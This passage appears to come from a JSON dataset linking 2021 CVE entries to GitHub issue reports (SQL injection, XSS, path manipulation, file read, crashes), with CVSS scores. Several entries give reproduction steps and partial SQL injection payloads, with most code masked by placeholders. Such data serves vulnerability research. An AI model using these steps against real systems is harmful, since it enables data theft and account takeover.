        "description": "SQL Injection vulnerability via multiple parameters in FILETAG . Author APITAG ( APITAG Version NUMBERTAG ulnerable parameters Staff Registration: afullname aemail apassword Doctor Registration: dfullname demail dpassword APITAG Delete Clerks: APITAG Delete Doctor: APITAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Login with User Type = Admin NUMBERTAG Input personal information in the form NUMBERTAG Click on the Register button NUMBERTAG Intercept the request and insert the payload in the value of parameters. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG Register function URLTAG FILETAG Delete function URLTAG FILETAG Remediation Validate input of all vulnerable parameters in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43630",
        "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4",
        "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4",
        "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
        "Issue_Created_At": "2021-11-08T13:16:26Z",
        "description": "SQL Injection vulnerability via multiple parameters in FILETAG . Author APITAG ( APITAG Version NUMBERTAG ulnerable parameters apfullname apphone_no apaddress APITAG APITAG Steps to reproduce NUMBERTAG Login to your patient account NUMBERTAG On the next patient page, enter personal information into the form NUMBERTAG Click on the Submit button NUMBERTAG Intercept the request and insert the payload in the value of parameters NUMBERTAG Forward the request Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG FILETAG FILETAG Remediation Validate input of all vulnerable parameters in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43631",
        "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5",
        "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5",
        "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
        "Issue_Created_At": "2021-11-08T14:00:14Z",
        "description": "SQL Injection vulnerability via \"appointment_no\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Login with User Type = Clerk NUMBERTAG In the All Appointments page, click on a record in the list NUMBERTAG Intercept the request and insert the payload in the value of the APITAG parameter NUMBERTAG Forward the request Example payloads: Boolean based ERRORTAG Time based APITAG UNION based ERRORTAG Proof of concept ERRORTAG Response in Burpsuite Time based FILETAG UNION based FILETAG Source code review FILETAG FILETAG FILETAG FILETAG Remediation Validate input of the APITAG parameter in APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43635",
        "Issue_Url_old": "https://github.com/jcv8000/Codex/issues/8",
        "Issue_Url_new": "https://github.com/jcv8000/codex/issues/8",
        "Repo_new": "jcv8000/codex",
        "Issue_Created_At": "2021-09-10T09:06:09Z",
        "description": "Code Execution vulnerability on Codex. Issue Cross site scripting(XSS) on Codex APITAG name lead to code execution. Reproduction NUMBERTAG Open Code NUMBERTAG Create new Notebook NUMBERTAG Insert payload on the Notebook(or page) name field On Mac APITAG test APITAG On Windows APITAG test APITAG NUMBERTAG Once you move your mouse over the link \"test\" , Calculator will be opened. APITAG Mitigation Disable APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43659",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1522",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1522",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2021-11-09T07:20:53Z",
        "description": "Arbitrary file upload in the backend could cause a stored XSS vulnerability.. What is version of Halo has the issue NUMBERTAG What database are you using? Other What is your deployment method? Fat Jar Your site address. _No response_ What happened? At the function point of uploading the avatar, any file can be uploaded, such as uploading an HTML file, which will cause a stored XSS vulnerability. the file upload function points. APITAG upload HTML file, show success. APITAG access the HTML file, you can see that it is parsed by the browser. APITAG If you upload malicious XSS code, you will get the user's token, like this Payload CODETAG FILETAG APITAG Analyzing the code, it can be seen that all suffixes can be uploaded, and there is no restriction on the suffix name of the file APITAG Its recommended to only allow the parameter extension to be FILETAG or other image suffixes APITAG Relevant log output _No response_ Additional information _No response_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-43666",
        "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/5136",
        "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/5136",
        "Repo_new": "mbed-tls/mbedtls",
        "Issue_Created_At": "2021-11-08T06:19:02Z",
        "description": "APITAG can't exit when the input password length is NUMBERTAG Summary I am using APITAG The testfile is as follows: CODETAG The program keeps running that cannot exit. Neither result nor error is given. Expected behavior Exit with a result, or an error code if not supported. Actual behavior The function does not exit.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43668",
        "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/23866",
        "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/23866",
        "Repo_new": "ethereum/go-ethereum",
        "Issue_Created_At": "2021-11-08T06:39:09Z",
        "description": "Nodes crash down after receiving a serial of messages generated by fuzzer, and cannot be recovered. System information Geth version: ERRORTAG OS & Version: APITAG Network: Private test net Expected behaviour Node sync block in the private net. Actual behaviour Node crashed down with \"runtime error: invalid memory address or nil pointer dereference\" Steps to reproduce the behaviour NUMBERTAG setup a NUMBERTAG node private geth nodes lcoally NUMBERTAG setup a fuzzing node continually sending fuzzed messages to other NUMBERTAG normal geth nodes NUMBERTAG After more than NUMBERTAG hours fuzzing experiment, one of the geth node who is run in fast mode crashed down. The running command for the node is CODETAG ERRORTAG When submitting logs: please submit them as text and not screenshots.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43668",
        "Issue_Url_old": "https://github.com/syndtr/goleveldb/issues/373",
        "Issue_Url_new": "https://github.com/syndtr/goleveldb/issues/373",
        "Repo_new": "syndtr/goleveldb",
        "Issue_Created_At": "2021-09-23T05:55:20Z",
        "description": "Nil pointer in leveldb. Hi, recently we received an issue report in Go ethereum project, it's a leveldb relevant panic because of nil pointer. The version we used is APITAG The original stack trace can be found here. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43673",
        "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/188",
        "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/188",
        "Repo_new": "zyx0814/dzzoffice",
        "Issue_Created_At": "2021-05-14T19:23:58Z",
        "description": "Possible XSS vulnerability . Hello, I would to report for a possible XSS vulnerability. In file APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43674",
        "Issue_Url_old": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289",
        "Issue_Url_new": "https://github.com/thinkupllc/thinkup/issues/2289",
        "Repo_new": "thinkupllc/thinkup",
        "Issue_Created_At": "2021-11-10T12:15:33Z",
        "description": "Possible Path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnrability: File APITAG line NUMBERTAG ERRORTAG File APITAG cache APITAG ERRORTAG File APITAG ERRORTAG File APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43676",
        "Issue_Url_old": "https://github.com/matyhtf/framework/issues/206",
        "Issue_Url_new": "https://github.com/matyhtf/framework/issues/206",
        "Repo_new": "matyhtf/framework",
        "Issue_Created_At": "2021-05-13T17:58:26Z",
        "description": "Possible path manipulation vulnerability. Hello, I would like to report for a path manipulation vulnerability. File FILETAG line NUMBERTAG ERRORTAG File FILETAG ERRORTAG File FILETAG ERRORTAG File FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43678",
        "Issue_Url_old": "https://github.com/gaoming13/wechat-php-sdk/issues/30",
        "Issue_Url_new": "https://github.com/gaoming13/wechat-php-sdk/issues/30",
        "Repo_new": "gaoming13/wechat-php-sdk",
        "Issue_Created_At": "2021-11-11T13:57:38Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. Vulnerability path File FILETAG Line NUMBERTAG ERRORTAG Line NUMBERTAG ERRORTAG Line NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43679",
        "Issue_Url_old": "https://github.com/shopex/ecshop/issues/4",
        "Issue_Url_new": "https://github.com/shopex/ecshop/issues/4",
        "Repo_new": "shopex/ecshop",
        "Issue_Created_At": "2021-11-11T15:27:51Z",
        "description": "Possible SQL injection vulnerability. Hello, I would like to report for SQLI vulnerability. Vulnerability path File PATHTAG APITAG File PATHTAG ERRORTAG File PATHTAG ERRORTAG File PATHTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43681",
        "Issue_Url_old": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23",
        "Issue_Url_new": "https://github.com/zerodream-cn/sakurapanel/issues/23",
        "Repo_new": "zerodream-cn/sakurapanel",
        "Issue_Created_At": "2021-11-11T16:17:30Z",
        "description": "Possible XSS vulnerability . Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG APITAG In function APITAG ERRORTAG line NUMBERTAG APITAG exit will terminate the script and print the message which have the value $data['proxy_name']. Then there is XSS vulnerability",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43682",
        "Issue_Url_old": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6",
        "Issue_Url_new": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6",
        "Repo_new": "baijunyao/thinkphp-bjyblog",
        "Issue_Created_At": "2021-11-11T16:39:45Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report XSS vulnerability. In file FILETAG line NUMBERTAG APITAG In file FILETAG line NUMBERTAG function U APITAG function U APITAG function redirect CODETAG exit function will terminate the script and print the message to the user which has $_SERVER['HTTP_HOST']. Then there is XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43683",
        "Issue_Url_old": "https://github.com/HaschekSolutions/pictshare/issues/133",
        "Issue_Url_new": "https://github.com/hascheksolutions/pictshare/issues/133",
        "Repo_new": "hascheksolutions/pictshare",
        "Issue_Created_At": "2021-11-11T17:03:54Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. in FILETAG function APITAG ERRORTAG line NUMBERTAG CODETAG exit function will terminate the script and print the message which has $_REQUEST['hash']. Then there is XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43685",
        "Issue_Url_old": "https://github.com/LibreTime/libretime/issues/1437",
        "Issue_Url_new": "https://github.com/libretime/libretime/issues/1760",
        "Repo_new": "libretime/libretime",
        "Issue_Created_At": "2021-11-11T18:10:07Z",
        "description": "Possible path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file FILETAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG APITAG line NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43686",
        "Issue_Url_old": "https://github.com/nZEDb/nZEDb/issues/2659",
        "Issue_Url_new": "https://github.com/nzedb/nzedb/issues/2659",
        "Repo_new": "nzedb/nzedb",
        "Issue_Created_At": "2021-11-12T15:10:52Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability file PATHTAG line NUMBERTAG ERRORTAG file PATHTAG in line NUMBERTAG ERRORTAG exit function will terminate the script and print the message which has the input $_GET['t']. Then there is XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43689",
        "Issue_Url_old": "https://github.com/yicenburan/manage/issues/2",
        "Issue_Url_new": "https://github.com/yicenburan/manage/issues/2",
        "Repo_new": "yicenburan/manage",
        "Issue_Created_At": "2021-11-12T21:31:27Z",
        "description": "Possible XSS vilnerability. Hello, I would like to report to XSS vulnerability. The path of the vulnerability. In file PATHTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG exit function will terminate the script and print a message to the user. Then there is XSS vulnerability because it contains values from $_POST.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43690",
        "Issue_Url_old": "https://github.com/Yurunsoft/YurunProxy/issues/3",
        "Issue_Url_new": "https://github.com/yurunsoft/yurunproxy/issues/3",
        "Repo_new": "yurunsoft/yurunproxy",
        "Issue_Created_At": "2021-11-13T17:22:16Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report to XSS vulnerability. The path. In file FILETAG line NUMBERTAG CODETAG In file FILETAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG ERRORTAG Exit function will terminate the script and print a message which have values from the socket_read. Which will lead to XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43691",
        "Issue_Url_old": "https://github.com/toocool/tripexpress/issues/40",
        "Issue_Url_new": "https://github.com/toocool/tripexpress/issues/40",
        "Repo_new": "toocool/tripexpress",
        "Issue_Created_At": "2021-11-13T17:44:22Z",
        "description": "Possible path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file PATHTAG APITAG line NUMBERTAG ERRORTAG The variable src is coming from $_SERVER[\"argv\"]. Then there is path manipulation vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43692",
        "Issue_Url_old": "https://github.com/zxq2233/youtube-php-mirroring/issues/3",
        "Issue_Url_new": "https://github.com/zxq2233/youtube-php-mirroring/issues/3",
        "Repo_new": "zxq2233/youtube-php-mirroring",
        "Issue_Created_At": "2021-11-13T18:06:33Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file FILETAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43693",
        "Issue_Url_old": "https://github.com/serghey-rodin/vesta/issues/2052",
        "Issue_Url_new": "https://github.com/serghey-rodin/vesta/issues/2052",
        "Repo_new": "serghey-rodin/vesta",
        "Issue_Created_At": "2021-05-14T23:15:25Z",
        "description": "Possible file inclusion vulnerability. Hello, I would like to report for possible file inclusion vulnerability. In file PATHTAG APITAG File PATHTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43695",
        "Issue_Url_old": "https://github.com/IssabelFoundation/issabelPBX/issues/33",
        "Issue_Url_new": "https://github.com/issabelfoundation/issabelpbx/issues/33",
        "Repo_new": "issabelfoundation/issabelpbx",
        "Issue_Created_At": "2021-11-14T17:09:49Z",
        "description": "Possible XSS vilnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file FILETAG APITAG In file FILETAG FILETAG ERRORTAG $msg carry the value from $_REQUEST without sanitization. Then there is XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43696",
        "Issue_Url_old": "https://github.com/happyman/twmap/issues/57",
        "Issue_Url_new": "https://github.com/happyman/twmap/issues/57",
        "Repo_new": "happyman/twmap",
        "Issue_Created_At": "2021-11-14T23:34:42Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file line NUMBERTAG APITAG exit function will terminate the script and print a message which has $_REQUEST. Then there is XSS vulnerability",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43697",
        "Issue_Url_old": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1",
        "Issue_Url_new": "https://github.com/happyliu2014/workerman-thinkphp-redis/issues/1",
        "Repo_new": "happyliu2014/workerman-thinkphp-redis",
        "Issue_Created_At": "2021-11-14T23:42:27Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG CODETAG exit function will terminate the script and print a message which has APITAG Then there is XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43698",
        "Issue_Url_old": "https://github.com/sparc/phpWhois.org/issues/21",
        "Issue_Url_new": "https://github.com/sparc/phpwhois.org/issues/21",
        "Repo_new": "sparc/phpwhois.org",
        "Issue_Created_At": "2021-11-15T00:27:17Z",
        "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. In file FILETAG CODETAG exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is XSS vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43700",
        "Issue_Url_old": "https://github.com/gongwalker/ApiManager/issues/26",
        "Issue_Url_new": "https://github.com/gongwalker/apimanager/issues/26",
        "Repo_new": "gongwalker/apimanager",
        "Issue_Created_At": "2021-11-10T13:32:12Z",
        "description": "APITAG NUMBERTAG sql injection. poc : python3 sqlmap.py u \" URLTAG \" sqlmap identified the following injection point(s) with a total of HTTP(s) requests: Parameter: tag (GET) Type: boolean based blind Title: AND boolean based blind WHERE or HAVING clause Payload: act=api&tag NUMBERTAG AND NUMBERTAG AND APITAG Type: time based blind Title: APITAG NUMBERTAG AND time based blind (query SLEEP) Payload: act=api&tag NUMBERTAG AND (SELECT NUMBERTAG FROM APITAG AND APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43701",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/31",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/31",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2021-04-14T11:09:30Z",
        "description": "Bug Report: Blind SQL Injection Vulnerability. Description: I found Blind SQL Injection vulnerability in your CMS APITAG \"export\" page. It refers to an injection attack where an attacker can execute malicious SQL statements that control a web application's database server. CMS Version NUMBERTAG Affected URL: URLTAG Steps to Reproduce NUMBERTAG At first login your panel NUMBERTAG then go to APITAG Menu > CSV Export / Import NUMBERTAG then select any Table Name and Select Fields. so your request data will be GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Waterfo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG APITAG PATHTAG mw back to live edit=true; show sidebar layouts NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG FILETAG FILETAG Proof of Concept: You can see the Proof of Concept. which I've attached a video to confirm the vulnerability. FILETAG Impact: An attacker could extract information from database. Let me know if any further info is required. Thanks & Regards Rahad Chowdhury Cyber Security Specialist APITAG Limited URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43703",
        "Issue_Url_old": "https://github.com/forget-code/zzcms/issues/1",
        "Issue_Url_new": "https://github.com/forget-code/zzcms/issues/1",
        "Repo_new": "forget-code/zzcms",
        "Issue_Created_At": "2021-11-11T03:47:58Z",
        "description": "By disabling APITAG to bypass administrator authentication restrictions. The administrator authentication code in FILETAG is as follows FILETAG FILETAG is the web application administrator authentication page. When the identity authentication fails, it will jump to the login page. There is a problem with the jump code on line NUMBERTAG of FILETAG . The page is redirected through APITAG but the program execution is not stopped immediately after the jump. So after disabling APITAG you can directly access the administrator console.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43707",
        "Issue_Url_old": "https://github.com/maccmspro/maccms10/issues/18",
        "Issue_Url_new": "https://github.com/maccmspro/maccms10/issues/18",
        "Repo_new": "maccmspro/maccms10",
        "Issue_Created_At": "2021-11-11T10:26:51Z",
        "description": "XSS. \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u57fa\u7840 >\u53cb\u94fe\u7ba1\u7406 >\u6dfb\u52a0\uff0c\u5728\u540d\u79f0\u5904link_name FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43721",
        "Issue_Url_old": "https://github.com/leanote/desktop-app/issues/364",
        "Issue_Url_new": "https://github.com/leanote/desktop-app/issues/364",
        "Repo_new": "leanote/desktop-app",
        "Issue_Created_At": "2021-11-12T09:17:28Z",
        "description": "Markdown type note XSS issue. i found a xss problem in the markdown type note you can verify the XSS with payload: APITAG and This leads to remote code execution with payload : APITAG the test version is NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-43724",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/890",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/890",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2021-11-08T16:01:45Z",
        "description": "this is Cross Site Scripting (XSS). I have found Cross Site Scripting (XSS) bug in subrion CMS version NUMBERTAG in the Create Page functionality of the admin Account. Steps to Reproduce: just login as admin and clink this url URLTAG As an admin Create test page In the Add a Page section go to the Page Content then clink \u201cimage\u201d choose local file NUMBERTAG svg to upload in url : URLTAG the content of APITAG APITAG APITAG APITAG FILETAG and then double click NUMBERTAG svg we can get a url as FILETAG FILETAG open the url FILETAG Xss prompt box will pop up FILETAG Impact: Session cookies can be stolen , user can be redirected to phishing pages , browser of the user visiting this page can be controlled etc. POC's have been uploaded. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-43734",
        "Issue_Url_old": "https://github.com/kekingcn/kkFileView/issues/304",
        "Issue_Url_new": "https://github.com/kekingcn/kkfileview/issues/304",
        "Repo_new": "kekingcn/kkfileview",
        "Issue_Created_At": "2021-11-14T13:08:01Z",
        "description": "arbitrary file read vulnerability. APITAG arbitrary file read vulnerability APITAG APITAG APITAG APITAG NUMBERTAG has arbitrary file read vulnerability which may lead to sensitive file leak on related host\u3002 \u6f0f\u6d1e\u4f4d\u7f6evulerable code location PATHTAG APITAG The vulnerable code is located at line NUMBERTAG in PATHTAG . The value which passed through param APITAG supports file protocol. ERRORTAG APITAG APITAG URLTAG \u53ef\u5f97 The version of official demo site is NUMBERTAG isit URLTAG and the concept is proofed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43735",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/55",
        "Issue_Url_new": "https://github.com/arterli/cmswing/issues/55",
        "Repo_new": "arterli/cmswing",
        "Issue_Created_At": "2021-11-14T12:04:02Z",
        "description": "SQLi vulnerability in Cmswing NUMBERTAG Find a SQLi vulnerability in cmswing project version APITAG can be found in the analysis below. Local Test APITAG the background of the system, select update_channel module\uff0cthen edit it. FILETAG APITAG behavior rule APITAG FILETAG APITAG FILETAG APITAG anything, then save it.we can find sqli vulnerability. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43736",
        "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/56",
